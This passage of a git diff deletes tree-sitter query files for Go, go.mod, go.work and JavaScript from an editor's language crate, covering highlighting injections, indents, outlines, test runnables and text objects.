"^[A-Z]"))) - -(range_clause (expression_list (identifier) @debug-variable)) - -(parenthesized_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(block) @debug-scope -(function_declaration) @debug-scope diff --git a/crates/languages/src/go/imports.scm b/crates/languages/src/go/imports.scm deleted file mode 100644 index 7f0ff2d46e6a271d4258d23f46cc942830e2c6f9..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_spec - name: [ - (dot) - (package_identifier) - ] - path: (interpreted_string_literal - (interpreted_string_literal_content) @namespace) -) @wildcard @import - -(import_spec - !name - path: (interpreted_string_literal - (interpreted_string_literal_content) @namespace) -) @wildcard @import diff --git a/crates/languages/src/go/indents.scm b/crates/languages/src/go/indents.scm deleted file mode 100644 index abbb72eb379d5fbb52267a633c60def07895a081..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/indents.scm +++ /dev/null @@ -1,9 +0,0 @@ -[ - (assignment_statement) - (call_expression) - (selector_expression) -] @indent - -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/go/injections.scm b/crates/languages/src/go/injections.scm deleted file mode 100644 index 58583f4d22c7db8016397d8e47cd817b7c240764..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/injections.scm +++ /dev/null @@ -1,735 +0,0 @@ -; Refer to https://github.com/nvim-treesitter/nvim-treesitter/blob/master/queries/go/injections.scm#L4C1-L16C41 -((comment) @injection.content - (#set! injection.language "comment") -) - -(call_expression - (selector_expression) @_function - (#any-of? @_function - "regexp.Match" "regexp.MatchReader" "regexp.MatchString" "regexp.Compile" "regexp.CompilePOSIX" - "regexp.MustCompile" "regexp.MustCompilePOSIX") - (argument_list - . - [ - (raw_string_literal) - (interpreted_string_literal) - ] @injection.content - (#set! injection.language "regex") - )) - -; INJECT SQL -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*sql\\s*\\*\\/$") - (#set! injection.language "sql") -) - -; INJECT JSON -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*json\\s*\\*\\/") ; /* json */ or /*json*/ - (#set! injection.language "json") -) - -; INJECT YAML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*yaml\\s*\\*\\/") ; /* yaml */ or /*yaml*/ - (#set! injection.language "yaml") -) - -; INJECT XML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*xml\\s*\\*\\/") ; /* xml */ or /*xml*/ - (#set! injection.language "xml") -) - -; INJECT HTML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*html\\s*\\*\\/") ; /* html */ or /*html*/ - (#set! injection.language "html") -) - -; INJECT JS -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*js\\s*\\*\\/") ; /* js */ or /*js*/ - (#set! injection.language "javascript") -) - - -; INJECT CSS -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*css\\s*\\*\\/") ; /* css */ or /*css*/ - (#set! injection.language "css") -) - - -; INJECT LUA -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*lua\\s*\\*\\/") ; /* lua */ or /*lua*/ - (#set! injection.language "lua") -) - -; INJECT BASH -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*bash\\s*\\*\\/") ; /* bash */ or /*bash*/ - (#set! injection.language "bash") -) - -; INJECT CSV -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - ((comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ) - ] - (#match? @_comment "^\\/\\*\\s*csv\\s*\\*\\/") ; /* csv */ or /*csv */ - (#set! injection.language "csv") -) diff --git a/crates/languages/src/go/outline.scm b/crates/languages/src/go/outline.scm deleted file mode 100644 index c745f55aff7dcd4b3bfd802884db7a985c1387fa..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/outline.scm +++ /dev/null @@ -1,67 +0,0 @@ -(comment) @annotation - -(type_declaration - "type" @context - [ - (type_spec - name: (_) @name) @item - ( - "(" - (type_spec - name: (_) @name) @item - ")" - ) - ] -) - -(function_declaration - "func" @context - name: (identifier) @name - parameters: (parameter_list - "(" - ")")) @item - -(method_declaration - "func" @context - receiver: (parameter_list - "(" @context - (parameter_declaration - name: (_) @context - type: (_) @context) - ")" @context) - name: (field_identifier) @name - parameters: (parameter_list - "(" - ")")) @item - -(const_declaration - "const" @context - (const_spec - name: (identifier) @name) @item) - -(source_file - (var_declaration - "var" @context - [ - ; The declaration may define multiple variables, and so @item is on - ; the identifier so they get distinct ranges. - (var_spec - name: (identifier) @name @item) - (var_spec_list - (var_spec - name: (identifier) @name @item) - ) - ] - ) -) - -(method_elem - name: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) @item - -; Fields declarations may define multiple fields, and so @item is on the -; declarator so they each get distinct ranges. -(field_declaration - name: (_) @name @item) diff --git a/crates/languages/src/go/runnables.scm b/crates/languages/src/go/runnables.scm deleted file mode 100644 index 786a923566d433f20b042178df2609e993e6da15..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/runnables.scm +++ /dev/null @@ -1,307 +0,0 @@ -; Functions names start with `Test` -( - ( - (function_declaration name: (_) @run - (#match? @run "^Test.*") - (#not-match? @run "^TestMain$")) - ) @_ - (#set! tag go-test) -) - -; Suite test methods (testify/suite) -( - (method_declaration - receiver: (parameter_list - (parameter_declaration - type: [ - (pointer_type (type_identifier) @_suite_name) - (type_identifier) @_suite_name - ] - ) - ) - name: (field_identifier) @run @_subtest_name - (#match? @_subtest_name "^Test.*") - (#match? @_suite_name ".*Suite") - ) @_ - (#set! tag go-testify-suite) -) - -; `go:generate` comments -( - ((comment) @_comment @run - (#match? @_comment "^//go:generate")) - (#set! tag go-generate) -) - -; `t.Run` -( - ( - (call_expression - function: ( - selector_expression - field: _ @run @_name - (#eq? @_name "Run") - ) - arguments: ( - argument_list - . - [ - (interpreted_string_literal) - (raw_string_literal) - ] @_subtest_name - . - (func_literal - parameters: ( - parameter_list - (parameter_declaration - name: (identifier) @_param_name - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) @_second_argument - ) - ) - ) @_ - (#set! tag go-subtest) -) - -; Functions names start with `Example` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Example.*")) - ) @_ - (#set! tag go-example) -) - -; Functions names start with `Benchmark` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Benchmark.*")) - ) @_ - (#set! tag go-benchmark) -) - -; Functions names start with `Fuzz` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Fuzz")) - ) @_ - (#set! tag go-fuzz) -) - -; go run -( - ( - (function_declaration name: (_) @run - (#eq? @run "main")) - ) @_ - (#set! tag go-main) -) - -; Table test cases - slice and map with explicit variable -( - (short_var_declaration - left: (expression_list (identifier) @_collection_var) - right: (expression_list - (composite_literal - type: [ - (slice_type) - (map_type - key: (type_identifier) @_key_type - (#eq? @_key_type "string") - ) - ] - body: (literal_value - [ - (literal_element - (literal_value - (keyed_element - (literal_element - (identifier) @_field_name - ) - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ) - ) - (keyed_element - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ] - ) - ) - ) - ) - (for_statement - (range_clause - left: (expression_list - [ - ( - (identifier) - (identifier) @_loop_var_inner - ) - (identifier) @_loop_var_outer - ] - ) - right: (identifier) @_range_var - (#eq? @_range_var @_collection_var) - ) - body: (block - (statement_list - (expression_statement - (call_expression - function: (selector_expression - operand: (identifier) - field: (field_identifier) @_run_method - (#eq? @_run_method "Run") - ) - arguments: (argument_list - . - [ - (selector_expression - operand: (identifier) @_tc_var - (#eq? @_tc_var @_loop_var_inner) - field: (field_identifier) @_field_check - (#eq? @_field_check @_field_name) - ) - (identifier) @_arg_var - (#eq? @_arg_var @_loop_var_outer) - ] - . - (func_literal - parameters: (parameter_list - (parameter_declaration - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) @_ - (#set! tag go-table-test-case) -) - -; Table test cases - slice and map declared right inside the loop without -; explicit variable -( - (for_statement - (range_clause - left: (expression_list - [ - ( - (identifier) - (identifier) @_loop_var_inner - ) - (identifier) @_loop_var_outer - ] - ) - right: (composite_literal - type: [ - (slice_type) - (map_type - key: (type_identifier) @_key_type - (#eq? @_key_type "string") - ) - ] - body: (literal_value - [ - (literal_element - (literal_value - (keyed_element - (literal_element - (identifier) @_field_name - ) - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ) - ) - (keyed_element - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ] - ) - ) - ) - body: (block - (statement_list - (expression_statement - (call_expression - function: (selector_expression - operand: (identifier) - field: (field_identifier) @_run_method - (#eq? @_run_method "Run") - ) - arguments: (argument_list - . - [ - (selector_expression - operand: (identifier) @_tc_var - (#eq? @_tc_var @_loop_var_inner) - field: (field_identifier) @_field_check - (#eq? @_field_check @_field_name) - ) - (identifier) @_arg_var - (#eq? @_arg_var @_loop_var_outer) - ] - . - (func_literal - parameters: (parameter_list - (parameter_declaration - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) @_ - (#set! tag go-table-test-case-without-explicit-variable) -) diff --git a/crates/languages/src/go/textobjects.scm b/crates/languages/src/go/textobjects.scm deleted file mode 100644 index eb4f3a00501021167c3c2b9136d5cef2f131878f..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/textobjects.scm +++ /dev/null @@ -1,25 +0,0 @@ -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(type_declaration - (type_spec (struct_type (field_declaration_list ( - "{" - (_)* @class.inside - "}")?)))) @class.around - -(type_declaration - (type_spec (interface_type - (_)* @class.inside))) @class.around - -(type_declaration) @class.around - -(comment)+ @comment.around diff --git a/crates/languages/src/gomod/injections.scm b/crates/languages/src/gomod/injections.scm deleted file mode 100644 index 321c90add3710f35721daeb6b42abe38af094953..0000000000000000000000000000000000000000 --- a/crates/languages/src/gomod/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment")) diff --git a/crates/languages/src/gomod/structure.scm b/crates/languages/src/gomod/structure.scm deleted file mode 100644 index ce1bc9aa3ee0b1f77086103bad91825b5927005f..0000000000000000000000000000000000000000 --- a/crates/languages/src/gomod/structure.scm +++ /dev/null @@ -1,35 +0,0 @@ -(require_directive - "require" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(exclude_directive - "exclude" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(module_directive - "module" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(replace_directive - "replace" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(retract_directive - "retract" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(ignore_directive - "ignore" @structure.anchor - ("(") @structure.open - (")") @structure.close -) diff --git a/crates/languages/src/gowork/injections.scm b/crates/languages/src/gowork/injections.scm deleted file mode 100644 index 321c90add3710f35721daeb6b42abe38af094953..0000000000000000000000000000000000000000 --- a/crates/languages/src/gowork/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment")) diff --git a/crates/languages/src/javascript/brackets.scm b/crates/languages/src/javascript/brackets.scm deleted file mode 100644 index a16a6432692ec7b9e0e3d24151cb814fc11bd83d..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/brackets.scm +++ /dev/null @@ -1,9 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -("<" @open "/>" @close) -("" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/javascript/debugger.scm b/crates/languages/src/javascript/debugger.scm deleted file mode 100644 index a99f194a4a4130210b47f8170fca039acc163411..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/debugger.scm +++ /dev/null @@ -1,23 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/javascript/imports.scm b/crates/languages/src/javascript/imports.scm deleted file mode 100644 index e26b97aeef9cb62395e7030f3173208d79187bd6..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? @alias)) - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !import_clause - source: (string (string_fragment) @source @wildcard)) @import diff --git a/crates/languages/src/javascript/indents.scm b/crates/languages/src/javascript/indents.scm deleted file mode 100644 index 9897f3060eaf37891cf4563cebc93345112422f8..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/indents.scm +++ /dev/null @@ -1,21 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - (if_statement) - (for_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -(jsx_opening_element ">" @end) @indent - -(jsx_element - (jsx_opening_element) @start - (jsx_closing_element)? @end) @indent diff --git a/crates/languages/src/javascript/injections.scm b/crates/languages/src/javascript/injections.scm deleted file mode 100644 index 244e025a6f5d62f1d3500fc35fc480b1baa2471e..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/injections.scm +++ /dev/null @@ -1,128 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? @_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? @_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string) @injection.content - (#set! injection.language "html") -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? @_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "isograph"))) -) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string 